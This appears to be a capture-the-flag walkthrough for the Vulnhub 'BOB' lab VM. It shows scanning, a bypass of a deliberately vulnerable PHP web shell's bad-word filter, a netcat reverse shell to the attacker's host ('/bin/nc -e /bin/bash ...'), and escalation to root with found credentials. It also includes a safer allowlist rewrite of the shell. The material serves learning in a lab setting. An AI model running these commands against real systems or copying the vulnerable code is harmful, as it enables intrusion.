Bob C0rruptedb1t

July 10, 2018   

Introduction

Today we are going to look at how I solved the BOB Boot2Root from C0rruptedb1t / Vulnhub. This is a fairly simple challenge as far as technical skill goes, but it requires strong logic and problem-solving; you really need to think outside the box with this one. I have chosen the VM from the c0rruptedb1t website as it appears to be the most up-to-date version.

VM Info

Name: BOB
Author: c0rruptedb1t
Link: http://c0rruptedb1t.ddns.net/vms/bob.html
Difficulty: Beginner
Networking: Host Only (192.168.21.130)

Discovery

First off we need to find the VM on our network. Since the BOB VM and my Kali VM are both connected via host-only networking, I know they are both in the 192.168.21.0/24 range, so I fire off a quick nmap ping-only scan to see what responds.

nmap -sn 192.168.21.0/24

Great, I know that 192.168.21.129 is my Kali VM, so 192.168.21.130 must be the BOB VM.
Let's take a look at what ports are open with an nmap port scan.

nmap -v -sS -A -T4 --reason -oA target_syn --webxml -p- 192.168.21.130

Let's break this down so we know what's going on.

Parameter        Reason
-v               Verbose output
-sS              TCP SYN scan
-A               Enable OS detection, version detection, script scanning, and traceroute
-T4              Aggressive timing template
--reason         Show host and port state reasons
-oA target_syn   Output in all formats, using target_syn as the base filename
--webxml         Make the XML output reference the XSL stylesheet on nmap.org so it renders in a browser
-p-              Scan all 65535 TCP ports

Once nmap has finished, we will find target_syn.xml in our working directory along with the other output formats should we need them.

Port    Description
80      Apache web server
25468   SSH

We have 2 ports open: a web server on port 80 and SSH on port 25468.
The report also tells us that a robots.txt was found with the following entries.

  • /login.php (404)
  • /dev_shell.php
    dev_shell
  • /lat_memo.html
    Memo sent at GMT+10:00 2:37:42 by User: Bob
    Hey guys IT here don't forget to check your emails regarding the recent security breach. There is a web shell running on the server with no protection but it should be safe as I have ported over the filter from the old windows server to our new linux one. Your email will have the link to the shell.

    -Bob
  • /passwords.html
    Really who made this file at least get a hash of your password to display, hackers can't do anything with a hash, this is probably why we had a security breach in the first place. Comeon people this is basic 101 security! I have moved the file off the server. Don't make me have to clean up the mess everytime someone does something as stupid as this. We will have a meeting about this and other stuff I found on the server. >:(
    -Bob

At this point we could try more content discovery, but it’s looking like we have everything we need here to get our foothold in this machine.

Initial shell

After some playing around with the ‘dev shell’ I noticed that if we type certain commands such as nc, netcat or ls we are presented with the message “Get out skid lol.” This matches lat_memo.html, which claims there is some kind of filter in place. The filter does appear to have a flaw though: it does not take absolute paths into account, meaning we can bypass it with /bin/ls and get a directory listing returned.

WIP.jpg about.html contact.html dev_shell.php dev_shell.php.bak dev_shell_back.png index.html index.html.bak lat_memo.html login.html news.html passwords.html robots.txt school_badge.png 

Brilliant, they have left a backup of dev_shell.php (dev_shell.php.bak) that we can download and take a look at.

<html>
<body>
  <?php
    //init
    $invalid = 0;
    $command = ($_POST['in_command']);
    $bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
  ?>
  <style>
    #back{
      position: fixed;
      top: 0;
      left: 0;
      min-width: 100%;
      min-height: 100%;
      z-index:-10
    }
    #shell{
      color: white;
      text-align: center;
    }
  </style>
  <div id="shell">
    <h2>
      dev_shell
    </h2>
    <form action="dev_shell.php" method="post">
      Command: <input type="text" name="in_command" /> <br>
      <input type="submit" value="submit">
    </form>
    <br>
    <h5>Output:</h5>
    <?php
      system("running command...");
      //executes system Command
      //checks for sneaky ;
      if (strpos($command, ';') !==false){
        system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
      }
      else{
        $is_he_a_bad_man = explode(' ', trim($command));
        //checks for dangerous commands
        if (in_array($is_he_a_bad_man[0], $bad_words)){
          system("echo Get out skid lol");
        }
        else{
          system($_POST['in_command']);
        }
      }
    ?>
  </div>
  <img src="dev_shell_back.png" id="back" alt="">
</body>
</html>

We can see from the PHP code that the list of bad words is pwd, ls, netcat, ssh, wget, ping, traceroute, cat and nc, and that only the first space-separated word of the command is compared against that list before the raw input is handed to system(). If there is a semicolon ( ; ) anywhere in our command it will also fail, with the message “Nice try skid, but you will never get through this bulletproof php code”.
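For contrast, here is an added example (not the VM's code) of how that output section could be written so there is nothing left to filter: the visitor picks a named action from a form field in_action, and each name maps to a fixed argv array that proc_open runs without a shell, so no user-supplied string ever reaches system(). The action names and binary paths are assumed for illustration, and even this version should sit behind authentication; the honest fix for a box like this is to remove the web shell altogether.

```php
<?php
// Added example, not code from the BOB VM: an allowlist-based replacement
// for the "Output:" section of dev_shell.php. The original compares only
// the first space-separated token of raw input against $bad_words and
// then passes the untouched string to system(); here the user never
// supplies a command string at all.

// Named actions mapped to fixed argv arrays (paths assumed for illustration).
$actions = [
    'uptime' => ['/usr/bin/uptime'],
    'disk'   => ['/bin/df', '-h'],
    'whoami' => ['/usr/bin/whoami'],
];

function run_action(array $actions, string $name): string
{
    // Exact-match lookup against the allowlist; anything else is refused.
    if (!array_key_exists($name, $actions)) {
        return "Unknown action";
    }
    $spec = [
        0 => ['pipe', 'r'],   // stdin
        1 => ['pipe', 'w'],   // stdout
        2 => ['pipe', 'w'],   // stderr
    ];
    // Passing an array (PHP >= 7.4) makes proc_open exec the binary directly,
    // so no shell ever parses the arguments.
    $proc = proc_open($actions[$name], $spec, $pipes);
    if (!is_resource($proc)) {
        return "Failed to start action";
    }
    fclose($pipes[0]);
    $out = stream_get_contents($pipes[1]);
    $err = stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    $status = proc_close($proc);
    return $status === 0 ? $out : "Action failed (exit $status)\n" . $err;
}

// Form field assumed to be <select name="in_action"> rather than a free-text box.
$requested = (string) ($_POST['in_action'] ?? '');
// Escape before echoing so command output cannot inject markup into the page.
echo '<pre>' . htmlspecialchars(run_action($actions, $requested), ENT_QUOTES, 'UTF-8') . '</pre>';
?>
```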

Knowing that we can bypass the filter by using an absolute path, we can use which nc to check whether netcat exists on the machine and what its absolute path is, which turns out to be ‘/bin/nc’. With this information we can build our command to get a simple netcat reverse shell. First of all we need to set up a listener on our Kali VM.

netcat -nvlp 4444

and then we can run our command in the PHP dev shell

/bin/nc -e /bin/bash 192.168.21.129 4444

In the asciicast you’ll see I ran python -c 'import pty; pty.spawn("/bin/bash")'; this upgrades us to a TTY-ish bash shell rather than the dumb netcat shell we get initially.

Getting The SSH Logins

Now we have our shell we can go exploring. There are a lot of random files lying around in the users’ home directories; bob is the boss, so it’s most likely that getting the bob account will lead to root. Let’s start with his home folder.
After some rummaging around we find some interesting files:

  • /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh
    #!/bin/bash
    clear
    echo "-= Notes =-"
    echo "Harry Potter is my faviorite"
    echo "Are you the real me?"
    echo "Right, I'm ordering pizza this is going nowhere"
    echo "People just don't get me"
    echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
    echo "Cucumber"
    echo "Rest now your eyes are sleepy"
    echo "Are you gonna stop reading this yet?"
    echo "Time to fix the server"
    echo "Everyone is annoying"
    echo "Sticky notes gotta buy em"
  • /home/bob/.old_passwordfile.html
    <html>
    <p>
    jc:Qwerty
    seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
    </p>
    </html>
  • /home/bob/Documents/login.txt.gpg (ENCRYPTED)
  • /home/bob/Documents/staff.txt
    Seb:

    Seems to like Elliot
    Wants to do well at his job
    Gave me a backdoored FTP to instal that apparently Elliot gave him

    James:

    Does nothing
    Pretty Lazy
    Doesn't give a shit about his job

    Elliot:

    Keeps to himself
    Always needs to challenge everything I do
    Keep an eye on him
    Try and get him fired

.old_passwordfile.html contains 2 SSH logins. Great, let’s log in as the regular user ‘jc’ with password ‘Qwerty’.

Long Story Short

I’ll admit this is where I got stuck, so I ended up Googling for a hint. I read that taking the first letter from each line of the notes.sh file gives the password for the login.txt.gpg file. To be honest I probably would never have got to that in a million years. Anyway, let’s continue down that path with the password HARPOCRATES:

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

OK! We have bob’s password (b0bcat_) so we can su to become bob.

Now we are bob we run id and can see he is in the sudo group, so we can sudo -s and enter bob’s password again to become root.

All that is left is to cat /flag.txt and we are done!